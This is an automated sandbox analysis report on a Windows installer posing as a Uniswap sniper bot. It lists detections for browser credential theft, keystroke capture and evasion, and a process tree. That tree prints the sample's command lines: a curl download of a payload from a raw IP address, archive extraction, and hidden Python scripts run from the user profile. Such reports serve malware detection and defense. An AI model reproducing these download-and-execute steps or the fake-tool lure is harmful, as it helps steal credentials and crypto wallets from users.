Edit tour
Windows
Analysis Report
uniswap-sniper-bot-with-gui Setup 1.0.0.exe
Overview
General Information
Detection
Score: | 60 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses known network protocols on non-standard ports
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Drops PE files
Drops certificate files (DER)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- uniswap-sniper-bot-with-gui Setup 1.0.0.exe (PID: 7648 cmdline:
"C:\Users\ user\Deskt op\uniswap -sniper-bo t-with-gui Setup 1.0 .0.exe" MD5: 48C179680E0B37D0262F7A402860B2A7) - cmd.exe (PID: 7720 cmdline:
"C:\Window s\system32 \cmd.exe" /c tasklis t /FI "USE RNAME eq % USERNAME%" /FI "IMAG ENAME eq u niswap-sni per-bot-wi th-gui.exe " /FO csv | "C:\Wind ows\system 32\find.ex e" "uniswa p-sniper-b ot-with-gu i.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7728 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 7772 cmdline:
tasklist / FI "USERNA ME eq user " /FI "IMA GENAME eq uniswap-sn iper-bot-w ith-gui.ex e" /FO csv MD5: 0A4448B31CE7F83CB7691A2657F330F1) - find.exe (PID: 7780 cmdline:
"C:\Window s\system32 \find.exe" "uniswap- sniper-bot -with-gui. exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
- uniswap-sniper-bot-with-gui.exe (PID: 7220 cmdline:
"C:\Users\ user\AppDa ta\Local\P rograms\un iswap-snip er-bot-wit h-gui\unis wap-sniper -bot-with- gui.exe" MD5: 45A55A09F6C74E7EAD24EE3FD391C8FF) - cmd.exe (PID: 5544 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "cu rl -Lo "C: \Users\use r\AppData\ Local\Temp \p.zi" "ht tp://86.10 4.74.51:12 24/pdown"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1368 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 4924 cmdline:
curl -Lo " C:\Users\u ser\AppDat a\Local\Te mp\p.zi" " http://86. 104.74.51: 1224/pdown " MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1) - uniswap-sniper-bot-with-gui.exe (PID: 4476 cmdline:
"C:\Users\ user\AppDa ta\Local\P rograms\un iswap-snip er-bot-wit h-gui\unis wap-sniper -bot-with- gui.exe" - -type=gpu- process -- user-data- dir="C:\Us ers\user\A ppData\Roa ming\unisw ap-sniper- bot-with-g ui" --gpu- preference s=UAAAAAAA AADgAAAYAA AAAAAAAAAA AAAAAABgAA AAAAAwAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAEgA AAAAAAAASA AAAAAAAAAY AAAAAgAAAB AAAAAAAAAA GAAAAAAAAA AQAAAAAAAA AAAAAAAOAA AAEAAAAAAA AAABAAAADg AAAAgAAAAA AAAACAAAAA AAAAA= --m ojo-platfo rm-channel -handle=17 80 --field -trial-han dle=1872,i ,407249039 6962110215 ,108860977 7799542871 3,131072 - -disable-f eatures=Sp areRendere rForSitePe rProcess,W inRetrieve Suggestion sOnlyOnDem and /prefe tch:2 MD5: 45A55A09F6C74E7EAD24EE3FD391C8FF) - explorer.exe (PID: 2580 cmdline:
C:\Windows \Explorer. EXE MD5: 662F4F92FDE3557E86D110526BB578D5) - uniswap-sniper-bot-with-gui.exe (PID: 5228 cmdline:
"C:\Users\ user\AppDa ta\Local\P rograms\un iswap-snip er-bot-wit h-gui\unis wap-sniper -bot-with- gui.exe" - -type=util ity --util ity-sub-ty pe=network .mojom.Net workServic e --lang=e n-GB --ser vice-sandb ox-type=no ne --user- data-dir=" C:\Users\u ser\AppDat a\Roaming\ uniswap-sn iper-bot-w ith-gui" - -mojo-plat form-chann el-handle= 2052 --fie ld-trial-h andle=1872 ,i,4072490 3969621102 15,1088609 7777995428 713,131072 --disable -features= SpareRende rerForSite PerProcess ,WinRetrie veSuggesti onsOnlyOnD emand /pre fetch:8 MD5: 45A55A09F6C74E7EAD24EE3FD391C8FF) - uniswap-sniper-bot-with-gui.exe (PID: 7936 cmdline:
"C:\Users\ user\AppDa ta\Local\P rograms\un iswap-snip er-bot-wit h-gui\unis wap-sniper -bot-with- gui.exe" - -type=rend erer --use r-data-dir ="C:\Users \user\AppD ata\Roamin g\uniswap- sniper-bot -with-gui" --app-pat h="C:\User s\user\App Data\Local \Programs\ uniswap-sn iper-bot-w ith-gui\re sources\ap p.asar" -- no-sandbox --no-zygo te --lang= en-GB --de vice-scale -factor=1 --num-rast er-threads =2 --enabl e-main-fra me-before- activation --rendere r-client-i d=4 --laun ch-time-ti cks=449675 4429 --moj o-platform -channel-h andle=2376 --field-t rial-handl e=1872,i,4 0724903969 62110215,1 0886097777 995428713, 131072 --d isable-fea tures=Spar eRendererF orSitePerP rocess,Win RetrieveSu ggestionsO nlyOnDeman d /prefetc h:1 MD5: 45A55A09F6C74E7EAD24EE3FD391C8FF) - cmd.exe (PID: 2196 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "ta r -xf C:\U sers\user\ AppData\Lo cal\Temp\p 2.zip -C C :\Users\us er" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5968 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tar.exe (PID: 3352 cmdline:
tar -xf C: \Users\use r\AppData\ Local\Temp \p2.zip -C C:\Users\ user MD5: 3596DC15B6F6CBBB6EC8B143CBD57F24) - uniswap-sniper-bot-with-gui.exe (PID: 3264 cmdline:
"C:\Users\ user\AppDa ta\Local\P rograms\un iswap-snip er-bot-wit h-gui\unis wap-sniper -bot-with- gui.exe" - -type=gpu- process -- disable-gp u-sandbox --use-gl=d isabled -- gpu-vendor -id=5140 - -gpu-devic e-id=140 - -gpu-sub-s ystem-id=0 --gpu-rev ision=0 -- gpu-driver -version=1 0.0.19041. 546 --user -data-dir= "C:\Users\ user\AppDa ta\Roaming \uniswap-s niper-bot- with-gui" --gpu-pref erences=UA AAAAAAAADo AAAYAAAAAA AAAAAAAAAA AABgAAAAAA AwAAAAAAAA AAAAAACAAA AAAAAAAAAA AAAAAAAAAA AAAEgAAAAA AAAASAAAAA AAAAAYAAAA AgAAABAAAA AAAAAAGAAA AAAAAAAQAA AAAAAAAAAA AAAOAAAAEA AAAAAAAAAB AAAADgAAAA gAAAAAAAAA CAAAAAAAAA A= --mojo- platform-c hannel-han dle=1016 - -field-tri al-handle= 1872,i,407 2490396962 110215,108 8609777799 5428713,13 1072 --dis able-featu res=SpareR endererFor SitePerPro cess,WinRe trieveSugg estionsOnl yOnDemand /prefetch: 2 MD5: 45A55A09F6C74E7EAD24EE3FD391C8FF) - cmd.exe (PID: 8140 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c ""C :\Users\us er\.pyp\py thon.exe" "C:\Users\ user/.sysi nfo"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6052 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - python.exe (PID: 5580 cmdline:
"C:\Users\ user\.pyp\ python.exe " "C:\User s\user/.sy sinfo" MD5: C793995B4BE06C17BF4AAE2E1302196B) - cmd.exe (PID: 3864 cmdline:
C:\Windows \system32\ cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - python.exe (PID: 4812 cmdline:
C:\Users\u ser\.pyp\p ython.exe C:\Users\u ser\.n2/pa y MD5: C793995B4BE06C17BF4AAE2E1302196B) - conhost.exe (PID: 2496 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - python.exe (PID: 4956 cmdline:
C:\Users\u ser\.pyp\p ython.exe C:\Users\u ser\.n2/bo w MD5: C793995B4BE06C17BF4AAE2E1302196B) - conhost.exe (PID: 5100 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 4456 cmdline:
C:\Windows \system32\ cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - powershell.exe (PID: 1072 cmdline:
powershell -Command " $u rl = \"htt ps://www.p ython.org/ ftp/python /3.11.0/py thon-3.11. 0-amd64.ex e\" $filePath = \"C:\Use rs\user\Ap pData\Loca l\Temp\tmp a8kcau3f.e xe\" Invoke-We bRequest - Uri $url - OutFile $f ilePath " MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 1880 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - python.exe (PID: 6416 cmdline:
C:\Users\u ser\.pyp\p ython.exe C:\Users\u ser\.n2/ml ip MD5: C793995B4BE06C17BF4AAE2E1302196B) - conhost.exe (PID: 6424 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
⊘No configs have been found
⊘No yara matches
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
⊘No Suricata rule has matched
Click to jump to signature section
Show All Signature Results
Source: | Static PE information: |
Source: | Registry value created: | Jump to behavior |
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Networking |
---|
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | DNS query: |
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: |